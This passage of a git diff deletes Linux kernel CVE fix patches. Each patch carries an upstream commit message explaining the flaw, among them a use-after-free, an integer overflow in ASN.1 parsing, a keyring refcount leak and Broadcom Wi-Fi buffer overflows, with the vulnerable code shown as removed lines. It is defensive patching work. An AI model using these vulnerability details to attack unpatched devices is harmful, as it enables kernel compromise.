@@ -1,78 +0,0 @@ -From dd42bf1197144ede075a9d4793123f7689e164bc Mon Sep 17 00:00:00 2001 -From: Peter Hurley -Date: Fri, 27 Nov 2015 14:30:21 -0500 -Subject: tty: Prevent ldisc drivers from re-using stale tty fields - -Line discipline drivers may mistakenly misuse ldisc-related fields -when initializing. For example, a failure to initialize tty->receive_room -in the N_GIGASET_M101 line discipline was recently found and fixed [1]. -Now, the N_X25 line discipline has been discovered accessing the previous -line discipline's already-freed private data [2]. - -Harden the ldisc interface against misuse by initializing revelant -tty fields before instancing the new line discipline. - -[1] - commit fd98e9419d8d622a4de91f76b306af6aa627aa9c - Author: Tilman Schmidt - Date: Tue Jul 14 00:37:13 2015 +0200 - - isdn/gigaset: reset tty->receive_room when attaching ser_gigaset - -[2] Report from Sasha Levin - [ 634.336761] ================================================================== - [ 634.338226] BUG: KASAN: use-after-free in x25_asy_open_tty+0x13d/0x490 at addr ffff8800a743efd0 - [ 634.339558] Read of size 4 by task syzkaller_execu/8981 - [ 634.340359] ============================================================================= - [ 634.341598] BUG kmalloc-512 (Not tainted): kasan: bad access detected - ... 
- [ 634.405018] Call Trace: - [ 634.405277] dump_stack (lib/dump_stack.c:52) - [ 634.405775] print_trailer (mm/slub.c:655) - [ 634.406361] object_err (mm/slub.c:662) - [ 634.406824] kasan_report_error (mm/kasan/report.c:138 mm/kasan/report.c:236) - [ 634.409581] __asan_report_load4_noabort (mm/kasan/report.c:279) - [ 634.411355] x25_asy_open_tty (drivers/net/wan/x25_asy.c:559 (discriminator 1)) - [ 634.413997] tty_ldisc_open.isra.2 (drivers/tty/tty_ldisc.c:447) - [ 634.414549] tty_set_ldisc (drivers/tty/tty_ldisc.c:567) - [ 634.415057] tty_ioctl (drivers/tty/tty_io.c:2646 drivers/tty/tty_io.c:2879) - [ 634.423524] do_vfs_ioctl (fs/ioctl.c:43 fs/ioctl.c:607) - [ 634.427491] SyS_ioctl (fs/ioctl.c:622 fs/ioctl.c:613) - [ 634.427945] entry_SYSCALL_64_fastpath (arch/x86/entry/entry_64.S:188) - -Cc: Tilman Schmidt -Cc: Sasha Levin -Signed-off-by: Peter Hurley -Signed-off-by: Greg Kroah-Hartman ---- - drivers/tty/tty_ldisc.c | 7 +++++++ - 1 file changed, 7 insertions(+) - -diff --git a/drivers/tty/tty_ldisc.c b/drivers/tty/tty_ldisc.c -index 9ec1250..a054d03 100644 ---- a/drivers/tty/tty_ldisc.c -+++ b/drivers/tty/tty_ldisc.c -@@ -417,6 +417,10 @@ EXPORT_SYMBOL_GPL(tty_ldisc_flush); - * they are not on hot paths so a little discipline won't do - * any harm. - * -+ * The line discipline-related tty_struct fields are reset to -+ * prevent the ldisc driver from re-using stale information for -+ * the new ldisc instance. -+ * - * Locking: takes termios_rwsem - */ - -@@ -425,6 +429,9 @@ static void tty_set_termios_ldisc(struct tty_struct *tty, int num) - down_write(&tty->termios_rwsem); - tty->termios.c_line = num; - up_write(&tty->termios_rwsem); -+ -+ tty->disc_data = NULL; -+ tty->receive_room = 0; - } - - /** --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-8966/3.15+/0001.patch b/Patches/Linux_CVEs/CVE-2015-8966/3.15+/0001.patch deleted file mode 100644 index 6019371a..00000000 --- a/Patches/Linux_CVEs/CVE-2015-8966/3.15+/0001.patch +++ /dev/null 
@@ -1,112 +0,0 @@ -From 76cc404bfdc0d419c720de4daaf2584542734f42 Mon Sep 17 00:00:00 2001 -From: Al Viro -Date: Mon, 28 Dec 2015 20:47:08 -0500 -Subject: [PATCH] arm: fix handling of F_OFD_... in oabi_fcntl64() - -Cc: stable@vger.kernel.org # 3.15+ -Reviewed-by: Jeff Layton -Signed-off-by: Al Viro ---- - arch/arm/kernel/sys_oabi-compat.c | 73 ++++++++++++++++++++------------------- - 1 file changed, 37 insertions(+), 36 deletions(-) - -diff --git a/arch/arm/kernel/sys_oabi-compat.c b/arch/arm/kernel/sys_oabi-compat.c -index b83f3b7..087acb5 100644 ---- a/arch/arm/kernel/sys_oabi-compat.c -+++ b/arch/arm/kernel/sys_oabi-compat.c -@@ -193,15 +193,44 @@ struct oabi_flock64 { - pid_t l_pid; - } __attribute__ ((packed,aligned(4))); - --asmlinkage long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd, -+static long do_locks(unsigned int fd, unsigned int cmd, - unsigned long arg) - { -- struct oabi_flock64 user; - struct flock64 kernel; -- mm_segment_t fs = USER_DS; /* initialized to kill a warning */ -- unsigned long local_arg = arg; -- int ret; -+ struct oabi_flock64 user; -+ mm_segment_t fs; -+ long ret; -+ -+ if (copy_from_user(&user, (struct oabi_flock64 __user *)arg, -+ sizeof(user))) -+ return -EFAULT; -+ kernel.l_type = user.l_type; -+ kernel.l_whence = user.l_whence; -+ kernel.l_start = user.l_start; -+ kernel.l_len = user.l_len; -+ kernel.l_pid = user.l_pid; -+ -+ fs = get_fs(); -+ set_fs(KERNEL_DS); -+ ret = sys_fcntl64(fd, cmd, (unsigned long)&kernel); -+ set_fs(fs); -+ -+ if (!ret && (cmd == F_GETLK64 || cmd == F_OFD_GETLK)) { -+ user.l_type = kernel.l_type; -+ user.l_whence = kernel.l_whence; -+ user.l_start = kernel.l_start; -+ user.l_len = kernel.l_len; -+ user.l_pid = kernel.l_pid; -+ if (copy_to_user((struct oabi_flock64 __user *)arg, -+ &user, sizeof(user))) -+ ret = -EFAULT; -+ } -+ return ret; -+} - -+asmlinkage long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd, -+ unsigned long arg) -+{ - switch (cmd) { - case F_OFD_GETLK: - case F_OFD_SETLK: 
-@@ -209,39 +238,11 @@ asmlinkage long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd, - case F_GETLK64: - case F_SETLK64: - case F_SETLKW64: -- if (copy_from_user(&user, (struct oabi_flock64 __user *)arg, -- sizeof(user))) -- return -EFAULT; -- kernel.l_type = user.l_type; -- kernel.l_whence = user.l_whence; -- kernel.l_start = user.l_start; -- kernel.l_len = user.l_len; -- kernel.l_pid = user.l_pid; -- local_arg = (unsigned long)&kernel; -- fs = get_fs(); -- set_fs(KERNEL_DS); -- } -- -- ret = sys_fcntl64(fd, cmd, local_arg); -+ return do_locks(fd, cmd, arg); - -- switch (cmd) { -- case F_GETLK64: -- if (!ret) { -- user.l_type = kernel.l_type; -- user.l_whence = kernel.l_whence; -- user.l_start = kernel.l_start; -- user.l_len = kernel.l_len; -- user.l_pid = kernel.l_pid; -- if (copy_to_user((struct oabi_flock64 __user *)arg, -- &user, sizeof(user))) -- ret = -EFAULT; -- } -- case F_SETLK64: -- case F_SETLKW64: -- set_fs(fs); -+ default: -+ return sys_fcntl64(fd, cmd, arg); - } -- -- return ret; - } - - struct oabi_epoll_event { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-8967/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8967/ANY/0001.patch deleted file mode 100644 index d87953ea..00000000 --- a/Patches/Linux_CVEs/CVE-2015-8967/ANY/0001.patch +++ /dev/null 
@@ -1,34 +0,0 @@
-From c623b33b4e9599c6ac5076f7db7369eb9869aa04 Mon Sep 17 00:00:00 2001
-From: Mark Rutland
-Date: Thu, 8 Jan 2015 11:42:59 +0000
-Subject: arm64: make sys_call_table const
-
-As with x86, mark the sys_call_table const such that it will be placed
-in the .rodata section. This will cause attempts to modify the table
-(accidental or deliberate) to fail when strict page permissions are in
-place. In the absence of strict page permissions, there should be no
-functional change.
-
-Signed-off-by: Mark Rutland
-Acked-by: Will Deacon
-Signed-off-by: Catalin Marinas
----
- arch/arm64/kernel/sys.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/arch/arm64/kernel/sys.c b/arch/arm64/kernel/sys.c
-index dec351a..75151aa 100644
---- a/arch/arm64/kernel/sys.c
-+++ b/arch/arm64/kernel/sys.c
-@@ -49,7 +49,7 @@ asmlinkage long sys_rt_sigreturn_wrapper(void);
- * The sys_call_table array must be 4K aligned to be accessible from
- * kernel/entry.S.
- */
--void *sys_call_table[__NR_syscalls] __aligned(4096) = {
-+void * const sys_call_table[__NR_syscalls] __aligned(4096) = {
- [0 ... __NR_syscalls - 1] = sys_ni_syscall,
- #include
- };
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-9004/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-9004/ANY/0001.patch
deleted file mode 100644
index bbc24aca..00000000
--- a/Patches/Linux_CVEs/CVE-2015-9004/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@ -From c3c87e770458aa004bd7ed3f29945ff436fd6511 Mon Sep 17 00:00:00 2001 -From: Peter Zijlstra -Date: Fri, 23 Jan 2015 11:19:48 +0100 -Subject: perf: Tighten (and fix) the grouping condition - -The fix from 9fc81d87420d ("perf: Fix events installation during -moving group") was incomplete in that it failed to recognise that -creating a group with events for different CPUs is semantically -broken -- they cannot be co-scheduled. - -Furthermore, it leads to real breakage where, when we create an event -for CPU Y and then migrate it to form a group on CPU X, the code gets -confused where the counter is programmed -- triggered in practice -as well by me via the perf fuzzer. - -Fix this by tightening the rules for creating groups. Only allow -grouping of counters that can be co-scheduled in the same context. -This means for the same task and/or the same cpu. - -Fixes: 9fc81d87420d ("perf: Fix events installation during moving group") -Signed-off-by: Peter Zijlstra (Intel) -Cc: Arnaldo Carvalho de Melo -Cc: Jiri Olsa -Cc: Linus Torvalds -Link: http://lkml.kernel.org/r/20150123125834.090683288@infradead.org -Signed-off-by: Ingo Molnar ---- - include/linux/perf_event.h | 6 ------ - kernel/events/core.c | 15 +++++++++++++-- - 2 files changed, 13 insertions(+), 8 deletions(-) - -diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h -index 4f7a61c..664de5a 100644 ---- a/include/linux/perf_event.h -+++ b/include/linux/perf_event.h -@@ -450,11 +450,6 @@ struct perf_event { - #endif /* CONFIG_PERF_EVENTS */ - }; - --enum perf_event_context_type { -- task_context, -- cpu_context, --}; -- - /** - * struct perf_event_context - event context structure - * -@@ -462,7 +457,6 @@ enum perf_event_context_type { - */ - struct perf_event_context { - struct pmu *pmu; -- enum perf_event_context_type type; - /* - * Protect the states of the events in the list, - * nr_active, and the list: -diff --git a/kernel/events/core.c b/kernel/events/core.c -index 
882f835a..19efcf1 100644 ---- a/kernel/events/core.c -+++ b/kernel/events/core.c -@@ -6776,7 +6776,6 @@ skip_type: - __perf_event_init_context(&cpuctx->ctx); - lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex); - lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock); -- cpuctx->ctx.type = cpu_context; - cpuctx->ctx.pmu = pmu; - - __perf_cpu_hrtimer_init(cpuctx, cpu); -@@ -7420,7 +7419,19 @@ SYSCALL_DEFINE5(perf_event_open, - * task or CPU context: - */ - if (move_group) { -- if (group_leader->ctx->type != ctx->type) -+ /* -+ * Make sure we're both on the same task, or both -+ * per-cpu events. -+ */ -+ if (group_leader->ctx->task != ctx->task) -+ goto err_context; -+ -+ /* -+ * Make sure we're both events for the same CPU; -+ * grouping events for different CPUs is broken; since -+ * you can never concurrently schedule them anyhow. -+ */ -+ if (group_leader->cpu != event->cpu) - goto err_context; - } else { - if (group_leader->ctx != ctx) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-0723/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0723/ANY/0001.patch deleted file mode 100644 index 6061ad90..00000000 --- a/Patches/Linux_CVEs/CVE-2016-0723/ANY/0001.patch +++ /dev/null 
@@ -1,69 +0,0 @@
-From 5c17c861a357e9458001f021a7afa7aab9937439 Mon Sep 17 00:00:00 2001
-From: Peter Hurley
-Date: Sun, 10 Jan 2016 22:40:55 -0800
-Subject: tty: Fix unsafe ldisc reference via ioctl(TIOCGETD)
-
-ioctl(TIOCGETD) retrieves the line discipline id directly from the
-ldisc because the line discipline id (c_line) in termios is untrustworthy;
-userspace may have set termios via ioctl(TCSETS*) without actually
-changing the line discipline via ioctl(TIOCSETD).
-
-However, directly accessing the current ldisc via tty->ldisc is
-unsafe; the ldisc ptr dereferenced may be stale if the line discipline
-is changing via ioctl(TIOCSETD) or hangup.
-
-Wait for the line discipline reference (just like read() or write())
-to retrieve the "current" line discipline id.
-
-Cc:
-Signed-off-by: Peter Hurley
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/tty/tty_io.c | 24 +++++++++++++++++++++++-
- 1 file changed, 23 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
-index a1b36bf..5cec01c 100644
---- a/drivers/tty/tty_io.c
-+++ b/drivers/tty/tty_io.c
-@@ -2659,6 +2659,28 @@ static int tiocsetd(struct tty_struct *tty, int __user *p)
- }
-
- /**
-+ * tiocgetd - get line discipline
-+ * @tty: tty device
-+ * @p: pointer to user data
-+ *
-+ * Retrieves the line discipline id directly from the ldisc.
-+ *
-+ * Locking: waits for ldisc reference (in case the line discipline
-+ * is changing or the tty is being hungup)
-+ */
-+
-+static int tiocgetd(struct tty_struct *tty, int __user *p)
-+{
-+ struct tty_ldisc *ld;
-+ int ret;
-+
-+ ld = tty_ldisc_ref_wait(tty);
-+ ret = put_user(ld->ops->num, p);
-+ tty_ldisc_deref(ld);
-+ return ret;
-+}
-+
-+/**
- * send_break - performed time break
- * @tty: device to break on
- * @duration: timeout in mS
-@@ -2884,7 +2906,7 @@ long tty_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- case TIOCGSID:
- return tiocgsid(tty, real_tty, p);
- case TIOCGETD:
-- return put_user(tty->ldisc->ops->num, (int __user *)p);
-+ return tiocgetd(tty, p);
- case TIOCSETD:
- return tiocsetd(tty, p);
- case TIOCVHANGUP:
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch
deleted file mode 100644
index 3ebb9904..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch
+++ /dev/null
@@ -1,12 +0,0 @@
-diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c
-index 42defae..cd871dc 100644
---- a/security/keys/process_keys.c
-+++ b/security/keys/process_keys.c
-@@ -792,6 +792,7 @@
- ret = PTR_ERR(keyring);
- goto error2;
- } else if (keyring == new->session_keyring) {
-+ key_put(keyring);
- ret = 0;
- goto error2;
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch.base64
deleted file mode 100644
index a6fb1945..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@ -ZGlmZiAtLWdpdCBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMgYi9zZWN1cml0eS9rZXlzL3Byb2Nlc3Nfa2V5cy5jCmluZGV4IDQyZGVmYWUuLmNkODcxZGMgMTAwNjQ0Ci0tLSBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMKKysrIGIvc2VjdXJpdHkva2V5cy9wcm9jZXNzX2tleXMuYwpAQCAtNzkyLDYgKzc5Miw3IEBACiAJCXJldCA9IFBUUl9FUlIoa2V5cmluZyk7CiAJCWdvdG8gZXJyb3IyOwogCX0gZWxzZSBpZiAoa2V5cmluZyA9PSBuZXctPnNlc3Npb25fa2V5cmluZykgeworCQlrZXlfcHV0KGtleXJpbmcpOwogCQlyZXQgPSAwOwogCQlnb3RvIGVycm9yMjsKIAl9Cg== \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch b/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch deleted file mode 100644 index 7def8f99..00000000 --- a/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch +++ /dev/null @@ -1,12 +0,0 @@ -diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c -index 0cf8a13..4e56371 100644 ---- a/security/keys/process_keys.c -+++ b/security/keys/process_keys.c -@@ -793,6 +793,7 @@ - ret = PTR_ERR(keyring); - goto error2; - } else if (keyring == new->session_keyring) { -+ key_put(keyring); - ret = 0; - goto error2; - } diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch.base64 deleted file mode 100644 index 66865b24..00000000 --- a/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -ZGlmZiAtLWdpdCBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMgYi9zZWN1cml0eS9rZXlzL3Byb2Nlc3Nfa2V5cy5jCmluZGV4IDBjZjhhMTMuLjRlNTYzNzEgMTAwNjQ0Ci0tLSBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMKKysrIGIvc2VjdXJpdHkva2V5cy9wcm9jZXNzX2tleXMuYwpAQCAtNzkzLDYgKzc5Myw3IEBACiAJCXJldCA9IFBUUl9FUlIoa2V5cmluZyk7CiAJCWdvdG8gZXJyb3IyOwogCX0gZWxzZSBpZiAoa2V5cmluZyA9PSBuZXctPnNlc3Npb25fa2V5cmluZykgeworCQlrZXlfcHV0KGtleXJpbmcpOwogCQlyZXQgPSAwOwogCQlnb3RvIGVycm9yMjsKIAl9Cg== \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch deleted file mode 100644 index c45c3c72..00000000 
--- a/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch +++ /dev/null @@ -1,12 +0,0 @@ -diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c -index bd536cb..db91639 100644 ---- a/security/keys/process_keys.c -+++ b/security/keys/process_keys.c -@@ -794,6 +794,7 @@ - ret = PTR_ERR(keyring); - goto error2; - } else if (keyring == new->session_keyring) { -+ key_put(keyring); - ret = 0; - goto error2; - } diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch.base64 deleted file mode 100644 index 5841bc83..00000000 --- a/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -ZGlmZiAtLWdpdCBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMgYi9zZWN1cml0eS9rZXlzL3Byb2Nlc3Nfa2V5cy5jCmluZGV4IGJkNTM2Y2IuLmRiOTE2MzkgMTAwNjQ0Ci0tLSBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMKKysrIGIvc2VjdXJpdHkva2V5cy9wcm9jZXNzX2tleXMuYwpAQCAtNzk0LDYgKzc5NCw3IEBACiAJCXJldCA9IFBUUl9FUlIoa2V5cmluZyk7CiAJCWdvdG8gZXJyb3IyOwogCX0gZWxzZSBpZiAoa2V5cmluZyA9PSBuZXctPnNlc3Npb25fa2V5cmluZykgeworCQlrZXlfcHV0KGtleXJpbmcpOwogCQlyZXQgPSAwOwogCQlnb3RvIGVycm9yMjsKIAl9Cg== \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch b/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch deleted file mode 100644 index c45c3c72..00000000 --- a/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch +++ /dev/null @@ -1,12 +0,0 @@ -diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c -index bd536cb..db91639 100644 ---- a/security/keys/process_keys.c -+++ b/security/keys/process_keys.c -@@ -794,6 +794,7 @@ - ret = PTR_ERR(keyring); - goto error2; - } else if (keyring == new->session_keyring) { -+ key_put(keyring); - ret = 0; - goto error2; - } diff --git a/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch.base64 deleted file mode 100644 index 5841bc83..00000000 
--- a/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -ZGlmZiAtLWdpdCBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMgYi9zZWN1cml0eS9rZXlzL3Byb2Nlc3Nfa2V5cy5jCmluZGV4IGJkNTM2Y2IuLmRiOTE2MzkgMTAwNjQ0Ci0tLSBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMKKysrIGIvc2VjdXJpdHkva2V5cy9wcm9jZXNzX2tleXMuYwpAQCAtNzk0LDYgKzc5NCw3IEBACiAJCXJldCA9IFBUUl9FUlIoa2V5cmluZyk7CiAJCWdvdG8gZXJyb3IyOwogCX0gZWxzZSBpZiAoa2V5cmluZyA9PSBuZXctPnNlc3Npb25fa2V5cmluZykgeworCQlrZXlfcHV0KGtleXJpbmcpOwogCQlyZXQgPSAwOwogCQlnb3RvIGVycm9yMjsKIAl9Cg== \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2016-0758/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0758/ANY/0001.patch deleted file mode 100644 index 016fbe0f..00000000 --- a/Patches/Linux_CVEs/CVE-2016-0758/ANY/0001.patch +++ /dev/null 
@@ -1,91 +0,0 @@
-From 23c8a812dc3c621009e4f0e5342aa4e2ede1ceaa Mon Sep 17 00:00:00 2001
-From: David Howells
-Date: Tue, 23 Feb 2016 11:03:12 +0000
-Subject: KEYS: Fix ASN.1 indefinite length object parsing
-
-This fixes CVE-2016-0758.
-
-In the ASN.1 decoder, when the length field of an ASN.1 value is extracted,
-it isn't validated against the remaining amount of data before being added
-to the cursor. With a sufficiently large size indicated, the check:
-
- datalen - dp < 2
-
-may then fail due to integer overflow.
-
-Fix this by checking the length indicated against the amount of remaining
-data in both places a definite length is determined.
-
-Whilst we're at it, make the following changes:
-
- (1) Check the maximum size of extended length does not exceed the capacity
- of the variable it's being stored in (len) rather than the type that
- variable is assumed to be (size_t).
-
- (2) Compare the EOC tag to the symbolic constant ASN1_EOC rather than the
- integer 0.
-
- (3) To reduce confusion, move the initialisation of len outside of:
-
- for (len = 0; n > 0; n--) {
-
- since it doesn't have anything to do with the loop counter n.
-
-Signed-off-by: David Howells
-Reviewed-by: Mimi Zohar
-Acked-by: David Woodhouse
-Acked-by: Peter Jones
----
- lib/asn1_decoder.c | 16 +++++++++-------
- 1 file changed, 9 insertions(+), 7 deletions(-)
-
-diff --git a/lib/asn1_decoder.c b/lib/asn1_decoder.c
-index 2b3f46c..5545229 100644
---- a/lib/asn1_decoder.c
-+++ b/lib/asn1_decoder.c
-@@ -74,7 +74,7 @@ next_tag:
-
- /* Extract a tag from the data */
- tag = data[dp++];
-- if (tag == 0) {
-+ if (tag == ASN1_EOC) {
- /* It appears to be an EOC. */
- if (data[dp++] != 0)
- goto invalid_eoc;
-@@ -96,10 +96,8 @@ next_tag:
-
- /* Extract the length */
- len = data[dp++];
-- if (len <= 0x7f) {
-- dp += len;
-- goto next_tag;
-- }
-+ if (len <= 0x7f)
-+ goto check_length;
-
- if (unlikely(len == ASN1_INDEFINITE_LENGTH)) {
- /* Indefinite length */
-@@ -110,14 +108,18 @@ next_tag:
- }
-
- n = len - 0x80;
-- if (unlikely(n > sizeof(size_t) - 1))
-+ if (unlikely(n > sizeof(len) - 1))
- goto length_too_long;
- if (unlikely(n > datalen - dp))
- goto data_overrun_error;
-- for (len = 0; n > 0; n--) {
-+ len = 0;
-+ for (; n > 0; n--) {
- len <<= 8;
- len |= data[dp++];
- }
-+check_length:
-+ if (len > datalen - dp)
-+ goto data_overrun_error;
- dp += len;
- goto next_tag;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0774/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0774/ANY/0001.patch
deleted file mode 100644
index b77c1a66..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0774/ANY/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From b381fbc509052d07ccf8641fd7560a25d46aaf1e Mon Sep 17 00:00:00 2001
-From: Ben Hutchings
-Date: Sat, 13 Feb 2016 02:34:52 +0000
-Subject: pipe: Fix buffer offset after partially failed read
-
-Quoting the RHEL advisory:
-
-> It was found that the fix for CVE-2015-1805 incorrectly kept buffer
-> offset and buffer length in sync on a failed atomic read, potentially
-> resulting in a pipe buffer state corruption. A local, unprivileged user
-> could use this flaw to crash the system or leak kernel memory to user
-> space. (CVE-2016-0774, Moderate)
-
-The same flawed fix was applied to stable branches from 2.6.32.y to
-3.14.y inclusive, and I was able to reproduce the issue on 3.2.y.
-We need to give pipe_iov_copy_to_user() a separate offset variable
-and only update the buffer offset if it succeeds.
-
-References: https://rhn.redhat.com/errata/RHSA-2016-0103.html
-Signed-off-by: Ben Hutchings
-Cc: Jeffrey Vander Stoep
-Signed-off-by: Zefan Li
----
- fs/pipe.c | 5 ++++-
- 1 file changed, 4 insertions(+), 1 deletion(-)
-
-(limited to 'fs/pipe.c')
-
-diff --git a/fs/pipe.c b/fs/pipe.c
-index abfb935..6049235 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -390,6 +390,7 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov,
- void *addr;
- size_t chars = buf->len, remaining;
- int error, atomic;
-+ int offset;
-
- if (chars > total_len)
- chars = total_len;
-@@ -403,9 +404,10 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov,
-
- atomic = !iov_fault_in_pages_write(iov, chars);
- remaining = chars;
-+ offset = buf->offset;
- redo:
- addr = ops->map(pipe, buf, atomic);
-- error = pipe_iov_copy_to_user(iov, addr, &buf->offset,
-+ error = pipe_iov_copy_to_user(iov, addr, &offset,
- &remaining, atomic);
- ops->unmap(pipe, buf, addr);
- if (unlikely(error)) {
-@@ -421,6 +423,7 @@ redo:
- break;
- }
- ret += chars;
-+ buf->offset += chars;
- buf->len -= chars;
-
- /* Was it a packet buffer? Clean up and exit */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch
deleted file mode 100644
index 4107b031..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch
+++ /dev/null
@@ -1,28 +0,0 @@
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index e9eb33d..f2ba9c8 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -1173,8 +1173,9 @@
- WL_DBG((" attr WPS_ID_CONFIG_METHODS: %x\n", HTON16(val)));
- } else if (subelt_id == WPS_ID_DEVICE_NAME) {
- char devname[100];
-- memcpy(devname, subel, subelt_len);
-- devname[subelt_len] = '\0';
-+ size_t namelen = MIN(subelt_len, sizeof(devname));
-+ memcpy(devname, subel, namelen);
-+ devname[namelen-1] = '\0';
- WL_DBG((" attr WPS_ID_DEVICE_NAME: %s (len %u)\n",
- devname, subelt_len));
- } else if (subelt_id == WPS_ID_DEVICE_PWD_ID) {
-@@ -9678,9 +9679,9 @@
- * scan request in the form of cfg80211_scan_request. For timebeing, create
- * cfg80211_scan_request one out of the received PNO event.
- */
-+ ssid[i].ssid_len = MIN(DOT11_MAX_SSID_LEN, netinfo->pfnsubnet.SSID_len);
- memcpy(ssid[i].ssid, netinfo->pfnsubnet.SSID,
-- netinfo->pfnsubnet.SSID_len);
-- ssid[i].ssid_len = netinfo->pfnsubnet.SSID_len;
-+ ssid[i].ssid_len);
- request->n_ssids++;
-
- channel_req = netinfo->pfnsubnet.channel;
diff --git a/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch.base64
deleted file mode 100644
index 0d485ae7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch
deleted file mode 100644
index 81904b74..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch
+++ /dev/null
@@ -1,152 +0,0 @@
-diff --git a/drivers/net/wireless/bcmdhd/dhd.h b/drivers/net/wireless/bcmdhd/dhd.h
-index 8c3f0f6..5e33262 100644
---- a/drivers/net/wireless/bcmdhd/dhd.h
-+++ b/drivers/net/wireless/bcmdhd/dhd.h
-@@ -813,7 +813,7 @@
- extern int dhd_net2idx(struct dhd_info *dhd, struct net_device *net);
- extern struct net_device * dhd_idx2net(void *pub, int ifidx);
- extern int net_os_send_hang_message(struct net_device *dev);
--extern int wl_host_event(dhd_pub_t *dhd_pub, int *idx, void *pktdata,
-+extern int wl_host_event(dhd_pub_t *dhd_pub, int *idx, void *pktdata, size_t pktlen,
- wl_event_msg_t *, void **data_ptr, void *);
- extern void wl_event_to_host_order(wl_event_msg_t * evt);
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_common.c b/drivers/net/wireless/bcmdhd/dhd_common.c
-index 8a6882f..201a0ac 100644
---- a/drivers/net/wireless/bcmdhd/dhd_common.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_common.c
-@@ -109,7 +109,7 @@
